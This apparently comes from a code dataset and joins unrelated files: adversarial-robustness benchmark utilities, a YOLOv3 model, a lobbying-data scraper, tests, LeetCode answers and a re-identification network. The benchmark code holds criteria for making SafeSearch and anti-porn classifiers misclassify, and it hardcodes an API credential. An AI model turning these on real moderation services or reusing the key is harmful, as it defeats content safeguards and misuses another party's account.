default_shape = (224, 224)
default_bound = (0, 1)
if special_shape.get(framework_name, None):
if special_shape[framework_name].get(model_name, None):
default_shape = special_shape[framework_name][model_name]
if special_bound.get(framework_name, None):
if special_bound[framework_name].get(model_name, None):
default_bound = special_bound[framework_name][model_name]
return {'shape': default_shape, 'bounds': default_bound}
def get_image(fname, framework_name, model_name, data_format):
"""Get the image suitable for target model."""
kwargs = get_image_format(framework_name, model_name)
kwargs['data_format'] = data_format
kwargs['fname'] = fname
image = load_image(**kwargs)
return image
def get_model(model_name, framework, summary):
"""Get model dispatcher."""
switcher = {
'keras': lambda: _load_keras_model(model_name, summary),
'tensorflow': lambda: _load_keras_model(model_name, summary),
'pytorch': lambda: _load_pytorch_model(model_name, summary),
'cloud': lambda: _load_cloud_model(model_name, summary)
}
_get_model = switcher.get(framework, None)
return _get_model()
def get_distance(distance_name):
"""Get the distance metric."""
import perceptron.utils.distances as distances
switcher = {
'mse': distances.MSE,
'mae': distances.MAE,
'linf': distances.Linf,
"l0": distances.L0,
"l2": distances.MSE
}
return switcher.get(distance_name, None)
def get_metric(attack_name, model, criteria, distance):
"""Get the attack class object."""
import perceptron.benchmarks as metrics
kwargs = {
'model': model,
'criterion': criteria,
'distance': distance,
}
switcher = {
"carlini_wagner_l2": lambda x: metrics.CarliniWagnerL2Metric(**x),
"carlini_wagner_linf": lambda x: metrics.CarliniWagnerLinfMetric(**x),
"additive_gaussian_noise": lambda x: metrics.AdditiveGaussianNoiseMetric(**x),
"additive_uniform_noise": lambda x: metrics.AdditiveUniformNoiseMetric(**x),
"blend_uniform_noise": lambda x: metrics.BlendedUniformNoiseMetric(**x),
"gaussian_blur": lambda x: metrics.GaussianBlurMetric(**x),
"brightness": lambda x: metrics.BrightnessMetric(**x),
"contrast_reduction": lambda x: metrics.ContrastReductionMetric(**x),
"motion_blur": lambda x: metrics.MotionBlurMetric(**x),
"rotation": lambda x: metrics.RotationMetric(**x),
"salt_and_pepper_noise": lambda x: metrics.SaltAndPepperNoiseMetric(**x),
"spatial": lambda x: metrics.SpatialMetric(**x),
"contrast": lambda x: metrics.ContrastReductionMetric(**x),
"horizontal_translation": lambda x: metrics.HorizontalTranslationMetric(**x),
"vertical_translation": lambda x: metrics.VerticalTranslationMetric(**x)
}
_init_attack = switcher.get(attack_name, None)
attack = _init_attack(kwargs)
return attack
def get_criteria(criteria_name, target_class=None):
"""Get the adversarial criteria."""
import perceptron.utils.criteria as criteria
switcher = {
"misclassification": lambda: criteria.Misclassification(),
"confident_misclassification": lambda: criteria.ConfidentMisclassification(),
"topk_misclassification": lambda: criteria.TopKMisclassification(10),
"target_class": lambda:criteria.TargetClass(target_class),
"original_class_probability": lambda:criteria.OriginalClassProbability(),
"target_class_probability": lambda:criteria.TargetClassProbability(target_class),
"target_class_miss_google": lambda:criteria.TargetClassMissGoogle(target_class),
"weighted_ap": lambda:criteria.WeightedAP(),
"misclassification_antiporn": lambda:criteria.MisclassificationAntiPorn(),
"misclassification_safesearch": lambda:criteria.MisclassificationSafeSearch(),
"target_class_miss": lambda:criteria.TargetClassMiss(target_class),
}
return switcher.get(criteria_name, None)()
def _load_keras_model(model_name, summary):
import keras.applications as models
switcher = {
'xception': lambda: models.xception.Xception(weights='imagenet'),
'vgg16': lambda: models.vgg16.VGG16(weights='imagenet'),
'vgg19': lambda: models.vgg19.VGG19(weights='imagenet'),
"resnet50": lambda: models.resnet50.ResNet50(weights='imagenet'),
"inception_v3": lambda: models.inception_v3.InceptionV3(weights='imagenet'),
"yolo_v3": lambda: _load_yolov3_model(),
"ssd300": lambda: _load_ssd300_model(),
"retina_resnet_50": lambda: _load_retinanet_resnet50_model()
}
_load_model = switcher.get(model_name, None)
_model = _load_model()
from perceptron.models.classification.keras import KerasModel as ClsKerasModel
from perceptron.models.detection.keras_ssd300 import KerasSSD300Model
from perceptron.models.detection.keras_yolov3 import KerasYOLOv3Model
from perceptron.models.detection.keras_retina_resnet50 import KerasResNet50RetinaNetModel
import numpy as np
format = get_image_format('keras', model_name)
if format['bounds'][1] == 1:
mean = np.array([0.485, 0.456, 0.406]).reshape((1, 1, 3))
std = np.array([0.229, 0.224, 0.225]).reshape((1, 1, 3))
preprocessing = (mean, std)
else:
preprocessing = (np.array([104, 116, 123]), 1)
switcher = {
'yolo_v3': lambda x: KerasYOLOv3Model(x, bounds=(0, 1)),
'ssd300': lambda x: KerasSSD300Model(x, bounds=(0, 255)),
'retina_resnet_50': lambda x: KerasResNet50RetinaNetModel(None, bounds=(0, 255)),
}
_wrap_model = switcher.get(
model_name,
lambda x: ClsKerasModel(x, bounds=format['bounds'], preprocessing=preprocessing))
kmodel = _wrap_model(_model)
return kmodel
def _load_cloud_model(model_name, summary):
import perceptron.models.classification.cloud as models
switcher = {
'aip_antiporn': lambda: _load_antiporn_model(),
"google_safesearch": lambda: models.GoogleSafeSearchModel(),
"google_objectdetection": lambda: models.GoogleObjectDetectionModel(),
}
_load_model = switcher.get(model_name, None)
cmodel = _load_model()
return cmodel
def _load_pytorch_model(model_name, summary):
import torchvision.models as models
switcher = {
'alexnet': lambda: models.alexnet(pretrained=True).eval(),
"vgg11": lambda: models.vgg11(pretrained=True).eval(),
"vgg11_bn": lambda: models.vgg11_bn(pretrained=True).eval(),
"vgg13": lambda: models.vgg13(pretrained=True).eval(),
"vgg13_bn": lambda: models.vgg13_bn(pretrained=True).eval(),
"vgg16": lambda: models.vgg16(pretrained=True).eval(),
"vgg16_bn": lambda: models.vgg16_bn(pretrained=True).eval(),
"vgg19": lambda: models.vgg19(pretrained=True).eval(),
"vgg19_bn": lambda: models.vgg19_bn(pretrained=True).eval(),
"resnet18": lambda: models.resnet18(pretrained=True).eval(),
"resnet34": lambda: models.resnet34(pretrained=True).eval(),
"resnet50": lambda: models.resnet50(pretrained=True).eval(),
"resnet101": lambda: models.resnet101(pretrained=True).eval(),
"resnet152": lambda: models.resnet152(pretrained=True).eval(),
"squeezenet1_0": lambda: models.squeezenet1_0(pretrained=True).eval(),
"squeezenet1_1": lambda: models.squeezenet1_1(pretrained=True).eval(),
"densenet121": lambda: models.densenet121(pretrained=True).eval(),
"densenet161": lambda: models.densenet161(pretrained=True).eval(),
"densenet201": lambda: models.densenet201(pretrained=True).eval(),
"inception_v3": lambda: models.inception_v3(pretrained=True).eval(),
}
_load_model = switcher.get(model_name, None)
_model = _load_model()
import torch
if torch.cuda.is_available():
_model = _model.cuda()
from perceptron.models.classification.pytorch import PyTorchModel as ClsPyTorchModel
import numpy as np
mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
pmodel = ClsPyTorchModel(
_model, bounds=(
0, 1), num_classes=1000, preprocessing=(
mean, std))
return pmodel
def _load_yolov3_model():
from perceptron.zoo.yolov3.model import YOLOv3
model = YOLOv3()
return model
def _load_ssd300_model():
from perceptron.zoo.ssd_300.keras_ssd300 import SSD300
model = SSD300()
return model
def _load_retinanet_resnet50_model():
from perceptron.models.detection.keras_retina_resnet50 import KerasResNet50RetinaNetModel
model = KerasResNet50RetinaNetModel()
return model
def _load_antiporn_model():
from perceptron.models.classification.cloud import AipAntiPornModel
appId = '15064794'
apiKey = '3R9pevnY2s077mCrzXP1Ole5'
secretKey = "<KEY>"
credential = (appId, apiKey, secretKey)
model = AipAntiPornModel(credential)
return model
# plot the images
def plot_image(adversary, title=None, figname='compare.png') :
prev = adversary.original_image
after = adversary.image
import numpy as np
if prev.shape[0] == 3 :
prev = np.transpose(prev, (1, 2, 0))
after = np.transpose(after, (1, 2, 0))
max_value = 255 if prev.max() > 1 else 1
diff = np.absolute(prev - after)
scale = max_value / diff.max()
diff = diff * scale
if max_value == 255:
prev = prev.astype('uint8')
after = after.astype('uint8')
diff = diff.astype('uint8')
fig, (ax1, ax2, ax3) = plt.subplots(1, 3)
plt.axis('off')
ax1.imshow(prev)
ax1.set_title('Origin')
ax1.axis('off')
ax2.imshow(after)
ax2.set_title('Adversary')
ax2.axis('off')
ax3.imshow(diff)
ax3.set_title('Diff * %.1f' % scale)
ax3.axis('off')
if title:
fig.suptitle(title, fontsize=12, fontweight='bold', y=0.80)
# in case you do not have GUI interface
plt.savefig(figname, bbox_inches='tight')
plt.show()
def plot_image_objectdetection(adversary, kmodel, bounds=(0, 1), title=None, figname='compare.png') :
from perceptron.utils.image import draw_letterbox
pred_ori = kmodel.predictions(adversary.original_image)
pred_adv = kmodel.predictions(adversary.image)
class_names = kmodel.get_class()
ori_image = draw_letterbox(adversary.original_image, pred_ori, class_names=class_names, bounds=bounds)
adv_image = draw_letterbox(adversary.image, pred_adv, class_names=class_names, bounds=bounds)
import matplotlib.pyplot as plt
fig, (ax1, ax2) = plt.subplots(1, 2)
plt.axis('off')
ax1.imshow(ori_image)
ax1.set_title('Origin')
ax1.axis('off')
ax2.imshow(adv_image)
ax2.set_title('Adversary')
ax2.axis('off')
if title :
fig.suptitle(title, fontsize=12, fontweight='bold', y=0.9)
# in case you do not have GUI interface
plt.savefig(figname, bbox_inches='tight', dpi=1000)
plt.show()
```
#### File: zoo/yolov3/model.py
```python
from functools import wraps
from functools import reduce
import numpy as np
import tensorflow as tf
from keras import backend as K
from keras.layers import Conv2D
from keras.layers import Add
from keras.layers import ZeroPadding2D
from keras.layers import UpSampling2D
from keras.layers import Concatenate
from keras.layers import MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.layers import Input
from keras.regularizers import l2
def YOLOv3(num_anchors=3, weight_file="yolov3.h5", num_classes=80):
from perceptron.utils.func import maybe_download_model_data
model = yolo_body(Input(shape=(None, None, 3)), num_anchors, num_classes)
weight_fpath = maybe_download_model_data(
weight_file,
'https://perceptron-benchmark.s3-us-west-1.amazonaws.com/models/coco/yolov3.h5')
model.load_weights(weight_fpath)
return model
def compose(*funcs):
"""Compose arbitrarily many functions, evaluated left to right.
Reference: https://mathieularose.com/function-composition-in-python/
"""
# return lambda x: reduce(lambda v, f: f(v), funcs, x)
if funcs:
return reduce(lambda f, g: lambda *a, **kw: g(f(*a, **kw)), funcs)
else:
raise ValueError('Composition of empty sequence not supported.')
@wraps(Conv2D)
def DarknetConv2D(*args, **kwargs):
"""Wrapper to set Darknet parameters for Convolution2D."""
darknet_conv_kwargs = {'kernel_regularizer': l2(5e-4)}
darknet_conv_kwargs['padding'] = 'valid' if \
kwargs.get('strides') == (2, 2) else 'same'
darknet_conv_kwargs.update(kwargs)
return Conv2D(*args, **darknet_conv_kwargs)
def DarknetConv2D_BN_Leaky(*args, **kwargs):
"""Darknet Convolution2D followed by BatchNormalization and LeakyReLU."""
no_bias_kwargs = {'use_bias': False}
no_bias_kwargs.update(kwargs)
return compose(
DarknetConv2D(*args, **no_bias_kwargs),
BatchNormalization(),
LeakyReLU(alpha=0.1))
def resblock_body(x, num_filters, num_blocks):
'''A series of resblocks starting with a downsampling Convolution2D'''
# Darknet uses left and top padding instead of 'same' mode
x = ZeroPadding2D(((1, 0), (1, 0)))(x)
x = DarknetConv2D_BN_Leaky(num_filters, (3, 3), strides=(2, 2))(x)
for i in range(num_blocks):
y = compose(
DarknetConv2D_BN_Leaky(num_filters // 2, (1, 1)),
DarknetConv2D_BN_Leaky(num_filters, (3, 3)))(x)
x = Add()([x, y])
return x
def darknet_body(x):
'''Darknent body having 52 Convolution2D layers'''
x = DarknetConv2D_BN_Leaky(32, (3, 3))(x)
x = resblock_body(x, 64, 1)
x = resblock_body(x, 128, 2)
x = resblock_body(x, 256, 8)
x = resblock_body(x, 512, 8)
x = resblock_body(x, 1024, 4)
return x
def make_last_layers(x, num_filters, out_filters):
'''6 Conv2D_BN_Leaky layers followed by a Conv2D_linear layer'''
x = compose(
DarknetConv2D_BN_Leaky(num_filters, (1, 1)),
DarknetConv2D_BN_Leaky(num_filters * 2, (3, 3)),
DarknetConv2D_BN_Leaky(num_filters, (1, 1)),
DarknetConv2D_BN_Leaky(num_filters * 2, (3, 3)),
DarknetConv2D_BN_Leaky(num_filters, (1, 1)))(x)
y = compose(
DarknetConv2D_BN_Leaky(num_filters * 2, (3, 3)),
DarknetConv2D(out_filters, (1, 1)))(x)
return x, y
def yolo_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 model CNN body in Keras."""
darknet = Model(inputs, darknet_body(inputs))
x, y1 = make_last_layers(
darknet.output, 512, num_anchors * (num_classes + 5))
x = compose(
DarknetConv2D_BN_Leaky(256, (1, 1)),
UpSampling2D(2))(x)
x = Concatenate()([x, darknet.layers[152].output])
x, y2 = make_last_layers(x, 256, num_anchors * (num_classes + 5))
x = compose(
DarknetConv2D_BN_Leaky(128, (1, 1)),
UpSampling2D(2))(x)
x = Concatenate()([x, darknet.layers[92].output])
x, y3 = make_last_layers(x, 128, num_anchors * (num_classes + 5))
return Model(inputs, [y1, y2, y3])
def tiny_yolo_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 model CNN body in keras.'''
x1 = compose(
DarknetConv2D_BN_Leaky(16, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(32, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(64, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(128, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(256, (3, 3)))(inputs)
x2 = compose(
MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
DarknetConv2D_BN_Leaky(512, (3, 3)),
MaxPooling2D(pool_size=(2, 2), strides=(1, 1), padding='same'),
DarknetConv2D_BN_Leaky(1024, (3, 3)),
DarknetConv2D_BN_Leaky(256, (1, 1)))(x1)
y1 = compose(
DarknetConv2D_BN_Leaky(512, (3, 3)),
DarknetConv2D(num_anchors * (num_classes + 5), (1, 1)))(x2)
x2 = compose(
DarknetConv2D_BN_Leaky(128, (1, 1)),
UpSampling2D(2))(x2)
y2 = compose(
Concatenate(),
DarknetConv2D_BN_Leaky(256, (3, 3)),
DarknetConv2D(num_anchors * (num_classes + 5), (1, 1)))([x2, x1])
return Model(inputs, [y1, y2])
``` |
{
"source": "jiayuqiujq/OpenSecrets_Senators_Industries",
"score": 3
} |
#### File: src/OpenSecrets_Senators_Industries/OpenSecrets_Senators_Industries.py
```python
from json.decoder import JSONDecodeError
import pandas as pd
import requests
from bs4 import BeautifulSoup
import lxml
# Web-scrapping the OpenSecrets Website for the Top 20 Industries that have spent the most on Federal Lobbying
def top_20_industries_ids(year='a'):
"""
Extracts the Top 20 Industries that have spent the most on Federal Lobbying from
https://www.opensecrets.org/federal-lobbying/industries.
Parameters
----------
year : str, optional
Specific year (1998 - 2021) for which to retrieve the data for (the default is 'a' which would
return the total amount of money spent on Federal Lobbying across all years from 1998 - 2021).
Returns
-------
pandas.DataFrame
Dataframe containing the Top 20 Industries that have spent the most on Federal Lobbying, the amount of
money they have each spent, and their unique Industry IDs.
Examples
--------
>>> top_20_industries_ids()
[ Industry Total IDs
0 Pharmaceuticals/Health Products $4,990,257,367 H04
1 Insurance $3,210,878,113 F09
2 Electronics Mfg & Equip $2,795,736,767 B12
3 Electric Utilities $2,757,808,440 E08
4 Business Associations $2,623,983,096 N00
5 Oil & Gas $2,489,418,498 E01
6 Hospitals/Nursing Homes $2,025,651,797 H02
7 Misc Manufacturing & Distributing $2,008,839,171 N15
8 Education $1,902,258,320 W04
9 Securities & Investment $1,897,760,970 F07
10 Civil Servants/Public Officials $1,887,599,161 W03
11 Telecom Services $1,883,769,733 B09
12 Real Estate $1,874,450,800 F10
13 Air Transport $1,730,349,996 M01
14 Health Professionals $1,712,045,500 H01
15 Health Services/HMOs $1,405,134,830 H03
16 Automotive $1,322,462,732 M02
17 TV/Movies/Music $1,301,018,584 B02
18 Misc Issues $1,247,693,549 Q10
19 Defense Aerospace $1,232,991,613 D01 ]
"""
url = ('https://www.opensecrets.org/federal-lobbying/industries?cycle=' + str(year))
html = requests.get(url)
soup = BeautifulSoup(html.text, 'html.parser')
# Extracting all the URLs from the website
urls = []
for link in soup.find_all('a'):
urls.append(link.get('href'))
# Extracting URLs that contain the unique industry IDs corresponding to each of the Top 20
url_ids = [url for url in urls if 'federal-lobbying/industries/summary' in url]
url_ids_df = pd.DataFrame(url_ids)
# Splitting the IDs from the rest of the URL
ids = url_ids_df[0].str.split('id=')
# Extracting list of unique industry IDs corresponding to each industry
industry_id = []
for i in range(len(ids)):
industry_id.append(ids[i][1])
# Extracting table of Top 20 Industries that have spent the most on Federal Lobbying along with the respective
# amounts they have spent
df = pd.read_html(html.text)[0][:20]
# Adding a column to the table which contains the industry IDs corresponding to each Industry
df['IDs'] = industry_id
return df
class ProPublicaAPIKey:
"""
All functions that require the ProPublica API Key.
Attributes
----------
propublica_api_key: str
ProPublica API Key to use ProPublica's Congress API. The API Key can be requested from
https://www.propublica.org/datastore/api/propublica-congress-api.
"""
def __init__(self, propublica_api_key):
self.propublica_api_key = propublica_api_key
def senate_members(self, congress_sitting=117):
"""
Uses the ProPublica API to extract a list of Senators.
Parameters
----------
congress_sitting: int, optional
Allows the user to specify senators from which sitting of Congress (80-117) they would like
information about (the default is 117, which would return all the senators in the 117th Congress).
Returns
-------
pandas.DataFrame
Pandas DataFrame containing the names, state and CRP IDs of all senators in a particular sitting of
Congress.
Examples
--------
>>> ProPublica = ProPublicaAPIKey('insert ProPublica API Key here')
>>> ProPublica.senate_members()
[ first_name middle_name last_name state crp_id
0 Tammy None Baldwin WI N00004367
1 John None Barrasso WY N00006236
2 Michael None Bennet CO N00030608
3 Marsha None Blackburn TN N00003105
4 Richard None Blumenthal CT N00031685
... ... ... ... ... ...
97 Elizabeth None Warren MA N00033492
98 Sheldon None Whitehouse RI N00027533
99 Roger None Wicker MS N00003280
100 Ron None Wyden OR N00007724
101 Todd None Young IN N00030670
102 rows × 5 columns ]
"""
# Calling the ProPublica Congress API to extract information about senators in a particular sitting of Congress
headers = {'X-API-Key': self.propublica_api_key}
r = requests.get('https://api.propublica.org/congress/v1/' + str(congress_sitting) + '/senate/members.json',
headers=headers)
try:
senate_members = r.json()
senate_members_df = pd.DataFrame(senate_members['results'][0]['members'])
# Selecting relevant columns to return
new_cols = ['first_name', 'middle_name', 'last_name', 'state', 'crp_id']
result = senate_members_df[new_cols]
return result
except KeyError:
print(f'Error: Unexpected content returned from API. Check if API Key is correct.')
class OpenSecretsAPIKey:
"""
All functions that require the OpenSecrets API Key.
Attributes
----------
opensecrets_api_key: str
OpenSecrets API Key to use ProPublica's Congress API. The API Key can be requested from
https://www.opensecrets.org/api/admin/index.php?function=signup.
"""
def __init__(self, opensecrets_api_key):
self.opensecrets_api_key = opensecrets_api_key
def top_senators_each_industry(self, propublica_api_key, industry_id='H04', **kwargs):
"""
Uses the OpenSecretsAPI and ProPublica API to provide the user with the senators who have received the most
amount of funding from a particular industry.
As the function makes as many calls as there are senators in a particular sitting of Congress, it may take a
while to return the necessary results.
Parameters
----------
propublica_api_key: class ProPublicaAPIKey
The user's ProPublica API Key. See documentation on ProPublicaAPIKey.
industry_id: str, optional
Unique industry_id. Full list of industry IDs can be found at www.opensecrets.org/downloads/crp/CRP_IDs.xls.
The user can also call top_20_industries_ids() to retrieve industry_ids. See documentation on
top_20_industries_ids() (the default is 'H04', corresponding to Pharmaceuticals/Health Products industry).
**kwargs : str, optional
Extra arguments to 'propublica_api_key.senate_members'. See documentation on
propublica_api_key.senate_members for possible arguments.
Returns
-------
pandas.DataFrame
Pandas DataFrame with Senators ranked according to who has received the most amount of funding from a
particular industry.
Examples
--------
>>> OpenSecrets = OpenSecretsAPIKey('insert OpenSecrets API Key here')
>>> ProPublica = ProPublicaAPIKey('insert ProPublica API Key here')
>>> OpenSecrets.top_senators_each_industry(ProPublica, industry_id = 'F09', congress_sitting = 116)
[ cand_name cid cycle industry last_updated party state total
0 Casey, Bob N00027503 2018 Insurance 06/10/19 D Pennsylvania 357820.0
1 <NAME> N00043290 2018 Insurance 06/10/19 R Florida 328912.0
2 <NAME> N00003535 2018 Insurance 06/10/19 D Ohio 316800.0
3 <NAME> N00033982 2018 Insurance 06/10/19 R Arizona 294825.0
4 <NAME> N00004118 2018 Insurance 06/10/19 D Michigan 292400.0
... ... ... ... ... ... ... ... ...
95 <NAME> N00013873 2018 Insurance 06/10/19 R Arkansas 3450.0
96 <NAME> N00031696 2018 Insurance 06/10/19 R Utah 3250.0
97 <NAME> N00006561 2018 Insurance 06/10/19 D New Mexico 1058.0
98 <NAME> N00009918 2018 Insurance 06/10/19 D Vermont 1015.0
99 <NAME> N00009920 2018 Insurance 06/10/19 R Alabama -5000.0
100 rows × 8 columns ]
See Also
--------
top_20_industries_ids()
ProPublicaAPIKey
"""
# Extracting Senators' CRP_IDs
senators_crp_id = propublica_api_key.senate_members(**kwargs)['crp_id']
# Initialising empty DataFrame for storing results
result = pd.DataFrame()
# for loop to retrieve the contribution received by each senator from the industry and storing them in DataFrame
for senator_id in senators_crp_id:
params = {'apikey': self.opensecrets_api_key, 'cid': senator_id, 'ind': industry_id, 'output': 'json'}
r_opensecrets = requests.get('https://www.opensecrets.org/api/?method=candIndByInd&', params=params)
# Passing calls that may return a null result as record is non-existent
try:
r_json = r_opensecrets.json()
r_df = pd.DataFrame(r_json['response']['candIndus'])
r_df_transpose = r_df.transpose()
# Progressively building DataFrame by adding each successful call to the DataFrame
result = pd.concat([result, r_df_transpose])
except JSONDecodeError:
pass
try:
# Changing values in 'total' column from str to float for sorting later
result['total'] = result['total'].astype(float)
# Selecting relevant columns to return
new_cols = ['cand_name', 'cid', 'cycle', 'industry', 'last_updated', 'party', 'state', 'total']
result = result.sort_values('total', ascending=False)[new_cols]
result = result.reset_index(drop=True)
return result
except KeyError:
print(f'Error: Unexpected content returned from API. Check if API Key is correct.')
``` |
{
"source": "jiayushe/hnr-2021",
"score": 3
} |
#### File: src/tests/test_utils.py
```python
import os
from utils import get_env_variable
def test_get_env_variable_fail():
try:
get_env_variable("not-existing-env")
assert False, "Expected KeyError exception was skipped"
except Exception:
assert True, "Expected KeyError exception was raised"
def test_get_env_variable_success():
os.environ["MY_ENV_VAR"] = "my-env-var"
try:
env_var = get_env_variable("MY_ENV_VAR")
assert env_var == "my-env-var"
assert not env_var == "wrong-var"
except Exception:
assert False
``` |
{
"source": "JiayuXu/leetcode-cn-answer",
"score": 3
} |
#### File: JiayuXu/leetcode-cn-answer/14.py
```python
class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
if len(strs)==0:
return ""
if len(strs)==1:
return strs[0]
if strs[0]=="":
return ""
for i,a in enumerate(strs[0]):
flag=True
for s in strs:
if i>=len(s) or a!=s[i]:
flag=False
break
if not flag:
return strs[0][:i]
```
#### File: JiayuXu/leetcode-cn-answer/1.py
```python
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
d={}
for i,n in enumerate(nums):
d_n=target-n
if d_n in d:
return [d[d_n],i]
d[n]=i
return [None,None]
```
#### File: JiayuXu/leetcode-cn-answer/70.py
```python
class Solution:
def climbStairs(self, n: int) -> int:
if n==1:
return 1
if n==2:
return 2
l=[1,2]
for i in range(2,n):
l.append(l[i-1]+l[i-2])
return l.pop()
``` |
{
"source": "JiazeWang/grad-cam-pytorch",
"score": 3
} |
#### File: JiazeWang/grad-cam-pytorch/mgn.py
```python
import copy
import torch
from torch import nn
import torch.nn.functional as F
from torchvision.models.resnet import resnet50, Bottleneck
#def make_model(args):
# return MGN(args)
class ConvBlock(nn.Module):
"""Basic convolutional block:
convolution + batch normalization + relu.
Args (following http://pytorch.org/docs/master/nn.html#torch.nn.Conv2d):
- in_c (int): number of input channels.
- out_c (int): number of output channels.
- k (int or tuple): kernel size.
- s (int or tuple): stride.
- p (int or tuple): padding.
"""
def __init__(self, in_c, out_c, k, s=1, p=0):
super(ConvBlock, self).__init__()
self.conv = nn.Conv2d(in_c, out_c, k, stride=s, padding=p)
self.bn = nn.BatchNorm2d(out_c)
def forward(self, x):
return F.relu(self.bn(self.conv(x)))
class SpatialAttn(nn.Module):
"""Spatial Attention (Sec. 3.1.I.1)"""
def __init__(self):
super(SpatialAttn, self).__init__()
self.conv1 = ConvBlock(1, 1, 3, s=2, p=1)
self.conv2 = ConvBlock(1, 1, 1)
def forward(self, x):
# global cross-channel averaging
x = x.mean(1, keepdim=True)
# 3-by-3 conv
x = self.conv1(x)
# bilinear resizing
x = F.upsample(x, (x.size(2)*2, x.size(3)*2), mode='bilinear', align_corners=True)
# scaling conv
x = self.conv2(x)
return x
class ChannelAttn(nn.Module):
"""Channel Attention (Sec. 3.1.I.2)"""
def __init__(self, in_channels, reduction_rate=16):
super(ChannelAttn, self).__init__()
assert in_channels%reduction_rate == 0
self.conv1 = ConvBlock(in_channels, in_channels // reduction_rate, 1)
self.conv2 = ConvBlock(in_channels // reduction_rate, in_channels, 1)
def forward(self, x):
# squeeze operation (global average pooling)
x = F.avg_pool2d(x, x.size()[2:])
# excitation operation (2 conv layers)
x = self.conv1(x)
x = self.conv2(x)
return x
class SoftAttn(nn.Module):
"""Soft Attention (Sec. 3.1.I)
Aim: Spatial Attention + Channel Attention
Output: attention maps with shape identical to input.
"""
def __init__(self, in_channels):
super(SoftAttn, self).__init__()
self.spatial_attn = SpatialAttn()
self.channel_attn = ChannelAttn(in_channels)
self.conv = ConvBlock(in_channels, in_channels, 1)
def forward(self, x):
y_spatial = self.spatial_attn(x)
y_channel = self.channel_attn(x)
y = y_spatial * y_channel
y = torch.sigmoid(self.conv(y))
return y
class HarmAttn(nn.Module):
"""Harmonious Attention (Sec. 3.1)"""
def __init__(self, in_channels):
super(HarmAttn, self).__init__()
self.soft_attn = SoftAttn(in_channels)
def forward(self, x):
y_soft_attn = self.soft_attn(x)
return y_soft_attn
class MGN(nn.Module):
def __init__(self):
super(MGN, self).__init__()
num_classes =739
num_feats = 256
resnet = resnet50(pretrained=True)
self.backone = nn.Sequential(
resnet.conv1,
resnet.bn1,
resnet.relu,
resnet.maxpool,
resnet.layer1,
resnet.layer2,
resnet.layer3[0],
)
self.ha1 = HarmAttn(1024)
res_conv4 = nn.Sequential(*resnet.layer3[1:])
res_g_conv5 = resnet.layer4
res_p_conv5 = nn.Sequential(
Bottleneck(1024, 512, downsample=nn.Sequential(nn.Conv2d(1024, 2048, 1, bias=False), nn.BatchNorm2d(2048))),
Bottleneck(2048, 512),
Bottleneck(2048, 512))
res_p_conv5.load_state_dict(resnet.layer4.state_dict())
self.p1 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))
self.p2 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))
self.p3 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))
#if args.pool == 'max':
#pool2d = nn.MaxPool2d
#elif args.pool == 'avg':
pool2d = nn.AvgPool2d
#else:
# raise Exception()
self.maxpool_zg_p1 = pool2d(kernel_size=(24, 8))
self.maxpool_zg_p2 = pool2d(kernel_size=(24, 8))
self.maxpool_zg_p3 = pool2d(kernel_size=(24, 8))
self.maxpool_zp2 = pool2d(kernel_size=(12, 8))
self.maxpool_zp3 = pool2d(kernel_size=(8, 8))
reduction = nn.Sequential(nn.Conv2d(2048, num_feats, 1, bias=False), nn.BatchNorm2d(num_feats), nn.ReLU())
self._init_reduction(reduction)
self.reduction_0 = copy.deepcopy(reduction)
self.reduction_1 = copy.deepcopy(reduction)
self.reduction_2 = copy.deepcopy(reduction)
self.reduction_3 = copy.deepcopy(reduction)
self.reduction_4 = copy.deepcopy(reduction)
self.reduction_5 = copy.deepcopy(reduction)
self.reduction_6 = copy.deepcopy(reduction)
self.reduction_7 = copy.deepcopy(reduction)
#self.fc_id_2048_0 = nn.Linear(2048, num_classes)
self.fc_id_2048_0 = nn.Linear(num_feats, num_classes)
self.fc_id_2048_1 = nn.Linear(num_feats, num_classes)
self.fc_id_2048_2 = nn.Linear(num_feats, num_classes)
self.fc_id_256_1_0 = nn.Linear(num_feats, num_classes)
self.fc_id_256_1_1 = nn.Linear(num_feats, num_classes)
self.fc_id_256_2_0 = nn.Linear(num_feats, num_classes)
self.fc_id_256_2_1 = nn.Linear(num_feats, num_classes)
self.fc_id_256_2_2 = nn.Linear(num_feats, num_classes)
self.fc_g = nn.Linear(num_feats * 8, num_classes)
self.fc_id_2048_0_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_2048_1_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_2048_2_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_1_0_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_1_1_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_2_0_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_2_1_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self.fc_id_256_2_2_w = nn.Sequential(nn.Linear(num_feats, 1), nn.Sigmoid())
self._init_fc(self.fc_id_2048_0)
self._init_fc(self.fc_id_2048_1)
self._init_fc(self.fc_id_2048_2)
self._init_fc(self.fc_id_256_1_0)
self._init_fc(self.fc_id_256_1_1)
self._init_fc(self.fc_id_256_2_0)
self._init_fc(self.fc_id_256_2_1)
self._init_fc(self.fc_id_256_2_2)
self._init_fc(self.fc_g)
"""
self._init_fc(self.fc_id_2048_0_w)
